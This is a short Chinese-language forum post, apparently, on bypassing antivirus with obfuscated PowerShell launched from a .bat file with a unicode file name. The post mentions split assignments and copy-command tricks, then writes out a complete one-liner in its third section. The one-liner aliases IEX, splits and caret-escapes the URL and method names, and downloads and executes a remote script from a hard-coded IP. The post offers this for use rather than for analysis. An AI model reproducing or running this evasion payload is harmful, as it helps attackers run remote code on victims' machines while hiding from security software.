Bypass_AV - Powershell 命令

0x01 发现组合
发现文件unicode + .bat可以有操作

0x02 组合
payload:
还有分割赋值等操作,也可以利用copy命令进行免杀
写入bat文件里面 然后转换文件名

0x03 操作
cmd /c echo set-alias -name xz -value IEX;x^z (New-Object
"NeT.WeBClienT").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://19’+'2.168.190.12'+'8/
a') | p^o^w^e^r^s^h^e^l^l -

1 Like